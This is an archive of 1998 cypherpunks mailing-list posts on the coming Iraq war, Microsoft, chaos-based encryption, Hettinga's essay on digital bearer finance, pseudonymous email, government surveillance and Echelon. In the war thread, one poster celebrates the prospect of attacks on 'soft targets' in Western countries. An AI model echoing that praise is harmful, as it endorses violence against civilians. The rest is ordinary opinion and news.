Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sat, 21 Feb 1998 12:40:08 +0800
To: "William H. Geiger III" <csm70830@port.ac.uk>
Subject: Re: No Real Debate Yet on the War
In-Reply-To: <89B3250098@ou20.csm.port.ac.uk>
Message-ID: <3.0.5.32.19980220092346.008dd590@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>>The more American, British, Australian, French etc. troops that die  in
>>the Gulf War II (tm), the more the western world will realise that  war
>>involves losses and that we cannot go on policing the world.  

As with the previous round of Desert Scam, very few invaders will die,
because the military objective is to cause mass destruction, not to 
conquer and hold.  And the press will focus on the invaders that die,
not on the tens or hundreds of thousands of Iraqis killed.

>Well if the US was to really take the moral HighGround on this they would
>be bombing France and Germany for supplying them with CBW supplies for
>years.

They'd also be focusing on the great job they've done eliminating the
entire US stock of CBW and nukes.  Oh, we haven't?  Well their weapons 
of mass destruction are Evil, and ours are Freedom Fighting Tools.
Actually the US and Former Soviet Union have substantially reduced the
nuclear forces, especially older missiles that are hard to maintain,
but the US refused for a long time to sign the CBW treaties,
and I'm not sure they ever did follow through and destroy their supplies.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul Bradley" <csm70830@port.ac.uk>
Date: Fri, 20 Feb 1998 17:32:02 +0800
To: Tim May <tcmay@got.net>
Subject: Re: No Real Debate Yet on the War
In-Reply-To: <v03102806b112432696c3@[207.167.93.63]>
Message-ID: <89B3250098@ou20.csm.port.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain




> * speaking of plans, the plans are very vague. The public does not know
> what the goals of a war might be, what the endgame options are, how many
> Americans are likely to die, what the likely counterpunch will be (hint:
> think terrorist attacks), and just how the U.S. plans to fight a war
> without clear goals and clear support.

Yes, it will be a great sight indeed to see Iraqi freedom-fighters 
bombing the hell out of soft targets in America, Britain, Australia 
and any other imperialist countries who like to consider themselves 
among the world police. 


> * essentially no one thinks a bombing campaign will either kill Saddam, who
> moves around a lot to highly secret locations (including houses of
> peasants), or will destroy all of those small cannisters of anthrax and
> sarin and the like...when asked, Albright and Cohen are vague and
> dissembling.

The same is true in the UK, a few days ago I saw a television 
interview (I rarely watch such rubbish but I sometimes like to laugh 
at the spin, but it also depresses me that most citizen-units swallow 
this crap) with some government minister who said that "We can attack 
strategic points along the production line without releasing any 
chemical agents", another lie. It is also a commonly held public 
misconception that there is such a thing as a "precision bombing 
campaign" (government spindoctor term) which most people believe 
implies a campaign where no-one is injured but we miraculously win 
a war without any casualties.  
The more American, British, Australian, French etc. troops that die 
in the Gulf War II (tm), the more the western world will realise that 
war involves losses and that we cannot go on policing the world.  

 
--                  
                            Paul Bradley 
                      paul@fatmans.demon.co.uk
       "Why should anyone want to live on rails?" - Stephen Fry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sat, 21 Feb 1998 12:40:00 +0800
To: Tim May <declan@well.com
Subject: Re: Fallaciousness of the Chicago School of Economics
In-Reply-To: <199802161934.TAA03259@server.eternity.org>
Message-ID: <3.0.5.32.19980220093846.008dd100@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam:
>>I tend to agree with the view that monopolies exist due to government
>>subsidies (eg. free government enforcement services for copyright,
>>corporate welfare, government contracts.)

Monopolies may depend on government for long-term stability,
but fads can stick around for quite a while before dying out.
Remember Disco?  :-)

Attila also talked about Intel making badly-designed microprocessors.
It was somewhat of a vicious circle, since the big market for 80*86s
required bug-for-bug compatibility with Microsloth's "640K is enough" 
real-mode DOS, partly because of the large investment companies had in 
applications like word processors that ran in that environment.
Getting out of the problem requires replacing a whole bunch of things
at the same time, and incremental upgrades can't get you there.
(For a horrendous example, there's the Air Traffic Control system,
brought to you by the same government that wants to help us fix our
Microsoft addictions; got any spare 360/90 clones?)

Tim:
>I am trying to sit out this latest "Microsoft" thread as much as I can bear
>to. (It seems that several lists I'm are consumeed by the dual memes of
>"What to do about Microsoft?" and "What to do about spam?" Same arguments,
>recycled endlessly.)
Obviously, ship the spam to Microsoft and be done with it :-)
The Spam Wars does seem to be muscling out "Libertarians vs. Statists"
as the canonical all-consuming political discussion on the net,
though there's a fair bit of overlap.




>My view is a simple one: those who don't like Microsoft products should use
>something else. It works for me.

Sigh.  In the business world, we tend to be stuck with Microsoft products,
chosen by the same clueless bureaucrats who choose 10-pound laptops :-)
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Sat, 21 Feb 1998 05:56:15 +0800
To: cypherpunks@toad.com
Subject: news chaos
Message-ID: <3.0.5.32.19980220095854.007cf2b0@otc.net>
MIME-Version: 1.0
Content-Type: text/plain



http://dailynews.yahoo.com/headlines/technology/wired/story.html?s=n/reuters
/980220/wired/stories/chaos_1.html

 Friday February 20 9:44 AM EST 

 Chaos may hold key to encryption, researchers say

 WASHINGTON (Reuters) - The key to secret communications may lie in chaos,
researchers reported Thursday. 

 They said they managed to encrypt information by making use of a noisy and
chaotic optical circuit. 

 Gregory VanWiggeren and Rjarshi Roy of the Georgia Institute of Technology
in Atlanta said they were able to use the chaotic
 fluctuations in a light signal to hide information. Duplicating qualities
of the transmitter allowed them to decode the message. 

 The value of such tools is growing as electronic commerce becomes more
widespread and businesses try to encode their material
 for secure transactions and communications. 

 They did not suggest how their scientific experiment, which they reported
in the journal Science, might be given a practical
 application. 

 VanWiggeren and Roy said they used an erbium-doped fiber ring laser. 

 "These lasers are particularly well suited for communication purposes
purposes because their lasing wavelengths roughly
 correspond to the minimum-loss wavelength in optical fiber," they wrote. 

 "A small 10 megahertz message was embedded in the larger chaotic carrier
and transmitted to the receiver system," they added.
 "The receiver has the same non-linearities as the transmitter, allowing it
to unfold the message from the chaos." 

 Researchers have in the past been able to bury messages in a noisy
electronic circuit but the low bandwidths of the systems make
 them less practical for high-speed communications. Optical circuits have
higher bandwidths. 

 "These preliminary but intriguing results suggest that chaos-based
applications may be more than just a laboratory curiosity," D. J.
 Gauthier at Duke University wrote in a commentary on the findings. 
------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

   If you plan to enter text which our system might consider to be obscene, 
   check here to certify that you are old enough to hear the resulting
output. 
		http://www.bell-labs.com/project/tts/voices.html






	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 20 Feb 1998 23:44:31 +0800
To: cypherpunks@cyberpass.net
Subject: A Geodesic Society?
Message-ID: <v04003a0cb1134f20d60d@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


X-Sender: rah@pop.sneaker.net
Mime-Version: 1.0
Date: Fri, 20 Feb 1998 08:36:21 -0500
To: e$@vmeng.com
From: Robert Hettinga <rah@shipwright.com>
Subject: A Geodesic Society?
Sender: <e$@vmeng.com>
Precedence: Bulk

The following is something I wrote for a private online conference
sponsored by Nikkei, the Japanese financial news organization. Since
they're supposedly combing the list for quotable bon mots, I may end up in
the Japanese papers. :-).

Anyway, longtime residents of this list have seen me say this kind of stuff
before, but for those who haven't, the following explains the kinds of
effects I think the combination of ubiquitous public networks and financial
cryptography can have.

Cheers,
Bob Hettinga

--- begin forwarded text


X-Sender: rah@pop.sneaker.net
Mime-Version: 1.0
Date: Thu, 19 Feb 1998 00:24:07 -0500
To: gis-ec@nikkei.co.jp, gis-net@nikkei.co.jp
From: Robert Hettinga <rah@shipwright.com>
Subject: [gis-asia 10] A Geodesic Society?
Cc: gis-asia@nikkei.co.jp
Reply-To: gis-asia@nikkei.co.jp
X-MLserver: majordomo-1.94.1 k-patch-2.0-alpha p-patch-1.0
X-sequence: gis-asia 10
Sender: owner-gis-asia@tokyo.nikkei.co.jp
Precedence: bulk

-----BEGIN PGP SIGNED MESSAGE-----

As the token cryptoanarchist around here, I've been lurking way too long,
mostly because I'm working on this financial cryptography conference we're
doing in Anguilla next week. However, A lot of good stuff has gone by on all
of these groups, and I think it's time I put my oar in and earned my keep a
bit before I enter the maelstrom of next week's FC98 conference, and loose
my chance to say anything here until it's all over.


The first topic I'd like to talk about is something which is more general
than my ostensible commercial focus in these discussions, and, after I've
said my piece here, I'll go back to the commerce list and pay more attention
to that end of things.  I have a little more to say there on what you can do
with the technology of money on public networks, though I'll drop a few
hints here to get people thinking about them.


My observation about networks in general is a rather obvious one when you
think about it: our social structures map to our communication structures.
As intuitive as it is to understand, this observation provides great insight
into where the technology of computer assisted communication will take us in
the years ahead.


Because of Moore's Law and its effect of collapsing the price of
semiconductors by half every 18 months, our telecommunication architectures
have changed from hierarchical networks, where it's cheaper to add lines
than it is to add expensive switching nodes, to geodesic networks, where it
is ever-exponentially cheaper to add microprocessor switches instead of now
relatively more expensive transmission lines.

This isn't new. In fact, it's outlined in Peter Huber's landmark "The
Geodesic Network", written in 1986 as a report for Judge Harold Greene as
part of the Modified Final Judgement which broke up American Telephone and
Telegraph, and with it the US telephone monopoly. I believe the original
version is still available from the US Government Printing Office, and I
know that you can order a revised edition from Peter Huber's law firm in
Washington. Huber himself is now a famous technology analyst from the
Manhattan Institute and a Forbes columnist, among other things.

In "The Geodesic Network", Huber observed that because the network was
becoming more and more geodesic, competition in telecommunications was
becoming much easier. That's because switching, a scarce thing which had
theretofore caused economies of scale and resultant "natural" monopoly, was
becoming cheaper and cheaper to build, and thus causing *dis*economies of
scale in the telephone markets.

One can almost hear Huber doing a little heavy lifting from the Marines in
report's conclusion, which was, essentially, "Deregulate 'em all, and let
God sort 'em out." It's nice to see that we're finally getting to see
deregulation of the "last mile" of the US telephone network 10 years after
Huber's recommendation.

As it is, it took *me* almost 10 years to realize something else about
geodesic networks. It's something which required me getting back on the
internet 4 years ago, after not being there since grad school, and
discovering that financial cryptography -- that is, the cryptographic
protocols for internet payment -- was much more important than the project
management software I had wanted to sell on the net at the time.

My realization was, if Moore's Law creates geodesic communications networks,
and our social structures -- our institutions, our businesses, our
governments -- all map to the way we communicate in large groups, then we
are in the process of creating a geodesic society. A society in which
communication between any two residents of that society, people, economic
entities, pieces of software, whatever, is geodesic: literally, the
straightest line across a sphere, rather than hierarchical, through a chain
of command, for instance.

This seems like a very simple truth these days. A "motherhood", as people in
American business like to say. But, once you start thinking about the world
in the terms of geodesic networks versus hierarchical ones, the world
changes. A Buckminster Fuller version of satori, if you will, though I'm
sure Bucky didn't think of human society in geodesic terms, at least from
what I've read of his work. His "World Game", for instance, is primarily
about the hierarchical centralization and redistribution of resources in an
industrial fashion. But, as it was, Bucky Fuller had discovered a geometric
archtype which was deeper than even his capacious understanding of its
implications had gotten him before.

So in light of this observation, for fun, let's look at human history in a
few paragraphs. :-).

Humans first lived in small groups on the African savanna. An artifact of
this life is the fact that most people can't have serious emotional
relationships with more than about 12 people, depending on how you define
serious. :-). Think of it as the carrying capacity of the human "switch",
and things get interesting. These small groups communicated geodesically.
When you wanted to talk to someone, you went up and talked to them. Then we
developed agriculture and its resulting food surpluses, people tended to
congregate at the crossroads of trade routes, and that's where the first
cities began. Civilization means, literally, "life in cities", remember?
Once we had large groups of people in a single place, we had lots of
information to pass around, but we also had expensive humans "switching"
that information who were only able to trust about 12 people at any time.
So, we had to develop hierarchical "networks", social organizations in other
words, to move that information around. Notice we finesse the whole trust
problem by using the entire hierarchy as one entity in everyone's
trusted-person list. That's why people die for king and country, for
instance, instead of just their family hunter-gatherer clan.

So, we can now see the ancient city-state as a hierarchy of power,
economics, whatever. We can also see ancient empires as a hierarchies of
city states, and so on. Notice that the size of any given hierarchy in
geographic terms is determined by the *speed* of communications it posesses.
Athenian triremes were very secure ways to move goods and information in a
relatively lawless Agean. Roman roads and galleys didn't just haul goods
quickly, they moved information as well. Staged Mongol riders could carry
messages across their own short-lived empire from a capital near China to
the gates of Warsaw in as little as 14 days. Napoleon invented his
10-mile-an-hour stagecoach and highway system for exactly the same reason,
and could almost legitimately call himself an emperor for the feat alone.

That brings us to the modern nation state, which, I claim, is entirely the
result of industrial communications technology. That is, you have
increasingly faster communications, from sailing ships to trains to
telegraphy and finally telephony, but you still have humans switching
information. That gives you larger and larger communication, and thus
social, hierarchies. Up until the automation of telephone switching --
paradoxically brought about a demand for universal service in exchange for
that ultimate industrial hierarchy, the US telephone monopoly -- things just
kept getting bigger and bigger. One could even see the increasing size of
government in this century as an "antihierarchy" funded by the forcible
confiscation or political extortion of economic rents from the large
industrial hierarchies where industrial society's money was being made in
the first place.

For a tasty little digression, Marxism then can be seen as simple
anti-industrialism, and an intriguing validation of Bertrand Russell's
comments about the similarity of Marxism and the feudal aristocracy it hated
so much. Hegel can't come to Marx's rescue here at all, because, for all
it's anarchistic pretensions, Marxism can now be seen as merely
industrialism's hierarchical antithesis, and not something "beyond
capitalism". Besides, trading has been around since the savana itself. It's
hard to imagine something antithetical to trade -- and have the result be
human, anyway. :-).


Okay. Now let's look at the future, shall we? Oddly enough, the "future"
starts with the grant of telephone monopoly to AT&T in the 1920's in
exchange for universal telephone service. When AT&T figured out that a
majority of people would have to be telephone operators for that to happen,
it started to automate switching, from electricomechanical, to electronic
(the transistor was invented at Ball Labs, remember), to, finally,
semiconducting microprocessors.  Which, Huber noted, brought us Moore's Law,
and, finally, that mother of all geodesic networks, the internet.

So, seen this way, using the hierarchy-to-geodesy synthesis (speaking of
Hegel :-)), a lot of things jump out right at us. Let's look at financial
operations, for example.

One can see, for instance, that the thing we call disintermediation in the
capital markets is in fact a process leading to something I call
*micro*intermediation, where large human decision hierarchies, like the New
York Stock Exchange, or money center banks, are being outcompeted by large
integrated proprietary computer networks, like the NASDAQ interbrokerage
network, or Fidelity Investments here in Boston. Yet, these financial
versions of big dumb bulletin boards, which still need humans to operate
them on behalf of the customer, will themselves be replaced someday by
smaller, more specialized and automated entities operating in increasingly
smaller market niches, and, we aren't just talking about financial
"shovelware", with database-driven web forms, either.

Someday, for instance, a couple of portfolio managers from Fidelity could
strike out on their own peculiar investment specialty, and set up a web
server to handle their investor relations, but in a way that financial
operations people thought was obsolete decades ago. Using financial
cryptgraphy like David Chaum's blind signature protocol, our portfolio
managers could just issue digital *bearer* certificates, right over the net
to their customers, representing shares in the portfolio they manage, rather
than keep track of all a given client's transactions in a database for
posterity. Even more fun, using the digital bearer *cash* they get from the
sale of those certificates, they could turn right around and instantly buy
debt, equity, or any derivative thereof, in digital bearer form, of course,
without waiting for any transactions to settle through a clearinghouse of
any kind. Why? Because knowing that you've digitally signed a unique blop of
bits and honoring the promises those various outstanding blops represent is
a whole lot easier, faster, and, of course, cheaper than keeping track of
every transaction you make for seven years, or whatever your friendly nation
state says you have to do so they can send somebody to jail if that person
lies to you. And, of course, digital bearer settlement is *much* faster than
waiting for all those book-entries to percolate through various
clearinghouses, banks, brokerages, and other financial intermediaries in
order for a trade to clear and settle.


Financial cryptography is a direct consequence of Moore's Law. You can't do
it without computers, and, more important, lots of cheap computers on a
network. But, you can do a lot of very neat things with it, as we've seen
above. In fact, the protocols of financial cryptography will be the glue
which holds a geodesic economy, if you will, together. And, of course, as
Deke Slayton put it, "No bucks, no Buck Rogers." No geodesic economy, no
geodesic society.

I joke about VISA being replaced someday by an innumerable swarm of very
small underwriting 'bots' whose job it is to form an ad hoc syndicate which
buys the personal digital bearer bond issue you floated for today's lunch.
In a geodesic market, the one-to-many relationships of hierarchical
book-entry-settled industrial finance, like checks and credit cards, becomes
to the many-to-one relationship of the geodesic digital-bearer-settled cash
and the personal bond syndicate.

But, what, you ask, do I do when someone defrauds me? The neat thing about
using financial cryptography on public networks is that you can use the much
cheaper early-industrial trust models that went away because you couldn't
shove a paper bearer bond down a telegraph wire. In short, reputation
becomes everything. Like J. Pierpont Morgan said 90 years ago,
"...Character. I wouldn't buy anything from a man with no character if he
offered me all the bonds in Christendom." In a geodesic market, if someone
commits fraud, everyone knows it. Instantly. And, something much worse than
incarceration happens to that person. That person's reputation "capital"
disappears. They cease to exist financially. Financial cryptographers
jokingly call it reputation capital punishment. :-). The miscreant has to
start all over with a new digital signature, and have to pay through the
nose until that signature's reputation's established. A very long and
expensive process, as anyone who's gone bankrupt will testify to.

So, you don't need biometric identity to stop non-repudiation. Translated,
that means that since you're moving secure digital bearer certificates over
an insecure private network like the internet, and not moving insecure
debits and credits over a secure private network like the SWIFT system, you
don't need audit trails to send someone to jail if they make the wrong book
entry.

Instead, you trust the issuer of a given piece of digital bearer cash, say,
and not the person who gave it to you, just like you trust the issuer of a
given currency today. Biometric identity is orthogonal to reputation in, um,
"cypherspace". And, of course, a financial intermediary like the above
issuer of digital bearer cash is not about to destroy its reputation for the
sake of a very small transaction like the one you're doing, any more than
the Fed would demand 6 one dollar bills in exchange for one five dollar bill
just to make an extra buck. Well, not since they started listening to
Friedman, anyway. :-)


Microintermediation means what it says. Financial intermediaries never go
away. You can't have markets, much less efficient ones, without financial
intermediaries buying things low and selling them high. Renting their
reputations to ensure transaction liquidity, in other words. This is at the
essense of Von Mises' "Calculation Argument" against planned economies, and
the defunct economy of the ex-Soviet Union is mute testament to that
particular economic truth.


Moore's Law, I like to say, operates like a surfactant of information,
breaking great globs of concentrated information fractally into smaller and
smaller bits, like so much grease in soapy dishwater. Capital, for the most
part, can now be converted into information and instantantly bought or sold,
or, more to the point, instantly settled and cleared in digital bearer form,
in increasingly smaller and smaller bits, by smaller and smaller and
increasingly more automated financial intermediaries. Microintermediated, in
other words.

What we get is a world where anything which can be digitized and sent down a
wire will be auctioned off in real-time in cash-settled markets. Stuff like
capital we've seen, but lots of other things, which are not immediately
intuitive. Machine instructions -- teleoperated or not. Software of all
kinds including entertainment and art. Bandwidth; I talk about a router
saving enough micromoney out of switching income to buy a copy of itself.

Maybe even adjudication and physical force, someday. After all, who says we
have to buy violence from the local force monopolies we now call nation
states, especially if we can get it cheaper and better -- and possibly in
smaller amounts -- in a competitive auction market?  Curioser and curioser,
as Alice used to say...

I mean, the nation-state's just another hierarchical artifact of industrial
communication technology, right? Besides, If everyone's paying for things in
cash and no book entry taxes can be collected because there aren't any book
entries, then, as someone said on a Harvard Law School list a few years ago,
"What happens when taxes become a tip"? Of course, there are various
cypherpunks out there who say things like "Write softare, not laws.", which
should make those folks on Mass Ave in Cambridge more than a little nervous
themselves.

So, welcome to the geodesic future. Not hoping to attract the wrath of the
famous curse, isn't it an, um, interesting place?


Cheers,
Bob Hettinga










-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.3

iQEVAwUBNOvB0cUCGwxmWcHhAQHVUAgAgYFUDcKLcsTNnevVmPaTp7lXxLo59oMI
qChTR7TmeEi0W6SgSn4nUd5zlJiBkx1ut6n2tIasvfpXgd3OaLqkPo9ZNSrMQZE7
8C1d5dI42/VgN36fDPgB/zVxNrqxDNIFYdOf9aH1A7u4TYUJTe9PSSQdfKxzMyTf
FQ+IfAzJjC3PFfxh566ghtHea7n235djGvAd8oHpr0SKBaSfu7jQjGUeecMDcTlg
ZzQf7V51MFcgKd/UPi2dybzYZoK8bIb7aJ9cazGc5k1chUOeVOykpW4EIvXZrBs7
Z0oRQfxwU/u+oLpA8Vt7xdK0qCTRLdxnsTzEFLUjTH/70ep3YNcgRA==
=9Xak
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>




----------------------------------------------------------------------
Where people, networks and money come together: Consult Hyperion
http://www.hyperion.co.uk/                   info@hyperion.co.uk
----------------------------------------------------------------------
Full-Strength Cryptographic Solutions for Worldwide Electronic Commerce
http://www.c2.net/                                   stronghold@c2.net
----------------------------------------------------------------------
Like e$? Help pay for it!
For e$/e$pam sponsorship or donations, <mailto:rah@shipwright.com>
----------------------------------------------------------------------

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Heinz-Juergen Keller <hjk@ddorf.rhein-ruhr.de>
Date: Fri, 20 Feb 1998 17:50:33 +0800
To: cypherpunks@cyberpass.net
Subject: Re: your mail
In-Reply-To: <241e4ef7f128aa790d464cb6e45d4dd2@anon.efga.org>
Message-ID: <Pine.LNX.3.96.980220103904.21770D-100000@alien.lummerland.de>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 19 Feb 1998, Anonymous wrote:

 
> In case my last message doesn't get through,
> I'm looking for info on how one can create and
> use a persistent Nym. I looked and can't find
> info on how to do this anywhere (besides the
> creation of a "free" email account somewhere).
> Can any cypherpunks help?
> 
> Thank you.
> 
> 
Lutz Donnerhacke is working on something you might like.
Have a look at http://www.iks-jena.de/mitarb/lutz/anon/as-node.en.html.

- -------------------------------------------------------------------------------
  Heinz-Juergen Keller     hjkeller@gmx.[net,de]
  2047bit PGP Public Key : http://www.ddorf.rhein-ruhr.de/~hjk/
  MD5 Fingerprint: 4d33126fbf8c1bcd8e96ba90d99f0bdc
- -------------------------------------------------------------------------------


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBNO1Q4CZWWJBRAP1VAQH0Agf/QLUl8XNlwmaXAn11+5EUn8NfoJV0PfP9
hkor4vhM98aTCiBCVZaZyNGN/enl501GYr6hTuOg7J6ZBWU0oXhYbSnYBxmD6h7r
rYp36Pyjtq5pbZrSGXz1OpRNUrnqEG31UlF7M0BgtlJYCc5iCdafN8iuHp5kbQRV
J/MHDURv5I0rPpybb2GnrcbxE38z7V9V4mQiRO6OJPJu7rO5Dpm7IHorIgjs3kv0
IV+laPgKYwM7w0xR88I4k+kYwVxVJBB8ekVcWlb+xz90VSVDL/0yJ64/okPf9ipd
sXIWsOPtaYu1qfW/fsabkuwXhGNNfDzCTUgDdJMV3bfnZek+vMMB6Q==
=4F5b
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sunder <sunder@brainlink.com>
Date: Sat, 21 Feb 1998 00:09:26 +0800
To: cypherpunks@Algebra.COM
Subject: Fwd: Big Brother Sees through walls (from the spyking list)
Message-ID: <34EDA7B4.A7AD9E88@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



1)From: "George Martin" <gmartin@kic.or.jp>
Subject: News Release: High-Tech Surveillance

NEWS FROM THE LIBERTARIAN PARTY
2600 Virginia Avenue, NW, Suite 100
Washington DC 20037
 
Do you have any privacy left when Big Brother can spy on
you from space -- or through your walls?

WASHINGTON, DC -- Spy satellites. Gamma ray scanners. 
Thermal-imaging devices.

It's not science fiction -- it's a list of the exotic, high-tech 
surveillance equipment the government now uses to monitor, track, 
and arrest American citizens, the Libertarian Party pointed out
today.

"Yesterday's science fiction has become today's political reality,"
said Steve Dasbach, the party's national chairman. "High-tech military
equipment that was once used against foreign armies is now
being used against American citizens on a routine basis."
  
As a result, the Fourth Amendment's protection against "unreasonable 
search" is under technological siege, he warned -- and government agencies 
are rushing to take advantage of this new power.
   
"Most people don't realize it, but law enforcement agencies are now
spying on us through the walls of our houses, taking high-resolution
photographs of us from space, and conducting drug tests based on trace
elements of chemicals in the air," said Dasbach.

Paranoid fantasy? Not at all: Such high-tech surveillance equipment
is becoming an increasingly common tool for law enforcement, according 
to reports in USA Today and the Wall Street Journal.
     
Here's a sampling of how state and federal agencies are using this
terrifying technology to spy on Americans:

* In North Carolina, county governments use high-resolution spy satellite
photographs to search for property improvements that might increase
property tax assessments.

* On the Mexican border, police use a "gamma ray scanner" to check
tanker trucks for contraband, scanning right through the vehicle's metal
sides.
  
* The Naval Surface Warfare Center has developed an "ion sniffer,"
a metal box that analyzes the chemical makeup of the air -- and can detect,
for example, traces of cocaine through the skin days after drug use.
 
* In Georgia, the state's Department of Revenue will start using
NASA satellites to examine the state's 58,910 square miles for illegal
timber cutting.
 
* In New Jersey, California, and other states, police use thermal
imaging devices to scan houses for unusual heat sources that could indicate
indoor marijuana growing operations. Houses can be scanned while police sit
in their cruisers on the street.
 
* And in Arizona, the state's Department of Water Resources uses
spy satellite photographs to monitor 750,000 acres of state farmland, and
compares the images to a database to discover which farmers don't have
irrigation permits.

Even worse: The federal government will spend another $4.5 million
this year to develop even more intrusive surveillance equipment.
  
Currently under development by the Justice Department: A "super
x-ray" -- combining traditional x-ray technology, ultra-sound imaging, 
and computer-aided metal detectors -- to reveal items hidden under clothes 
from up to 60 feet away.

The courts are currently wrestling with the implications of the new
technology, debating the limits of the government's power to "search"
individuals from a distance with high-tech gadgets. Several contradictory
court decisions have already emerged, for example, about whether
thermal-imaging searches are Constitutional.

Meanwhile, Republican and Democratic politicians continue to look
for new uses of the technology -- with some government officials already
talking about using satellite surveillance to track items as small as
backyard porches to check for zoning violations and construction permits.

"In the name of fighting crime, politicians seem eager to obliterate the
protections against unreasonable search, with equipment that Americans used
to only read about in Tom Clancy technothrillers," said Dasbach. "It's time
for the American public to wake up and realize that Big Brother is here
today -- and he's got a gamma ray scanner in his hand."


-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sunder <sunder@brainlink.com>
Date: Sat, 21 Feb 1998 00:12:34 +0800
To: cypherpunks@cyberpass.net
Subject: FWD: Confirmations of Echelon (from Spy King)
Message-ID: <34EDA873.83F5A3@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



4)From: mkw-detective@t-online.de (MK-Wirtschaftsdienst GmbH)
Subject: NSA spying in Europe

The german online-magaine "Com!" (author: ulrike.duhm@t-online.de)
brought an article about the report of the european parliament.

Here a summary:

The european parliament reported, that the american secret service NSA
is monitoring emails, phonecalls and faxes. The informations are
forwarded from London and Menwith Hill via satellite to Fort Meade in
Maryland. Menwith Hill in Yorkshire, England, is the biggest spy post of
the world, that for the NSA collects political, economical, military and
private informations from europe and the former Sowjetunion.

The 48 year old Glyn Ford, member of the Labour-Party is behind this
report. Author of the 100 page document is Steve Wright of the
Manchester Omega foundation. The complete report can be found under:
www.heise.de/tp/deutsch/inhalt/te/1393/anchor1.html

For the first time, the european parliament confirmed the existence of
the spy network Echelon, the american part of the spysystem UKUSA.
1948, the USA, England, Canada, Australia and New Zeeland signed a
secret contract, the so called "United Kingdom - United States
Agreement" (UKUSA). Goal of it is the collective espionage. Via an
international ring of agents, the partners are exchanging informations.

The german hackers "Chaos Computer Club" (www.ccc.de) thinks, that the
european eMail-user is trapped in a net of foreign forces. They are
concerned, that the newest versions of the encryption software PGP are
in part not compatible with older versions. The result: The exchange
between different versions is not possible. For the computer club, that
is no coincidence: the hackers from Hamburg, Germany,  believe, that a
contract between USA and Germany exists, that Germany is not allowed to
use a software, that the NSA cannot look in."

So far some excerpts out of the article.  Here some homepages:

Glyn Ford:                   www.zen.co.uk/home/page/glyn.ford/index.htm

NSA:                          www.nsa.gov:8080

european parliament:    www.europarl.eu.int

Heise newsticker:
www.telepolis.de/newsticker/data/ae-09.01.98-000

spy post Menwith Hill: www.fas.org/irp/facility/menwith.htm

Electronic telegraph:
www.telegraph.co.uk:80/et?ac=000602131144806&rtmo=
OsKsx2bq&atmo=OsKsx2bq&pg=/et/97/12/16/ecspy16.html

Greetings from Germany
Rolf G. Wilmink
MK-W Security and Investigations
Member: BID, NAIS, WAD
www.mknet.de/mkw
mkw-detective@t-online.de
-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Sat, 21 Feb 1998 05:55:44 +0800
To: cypherpunks@toad.com
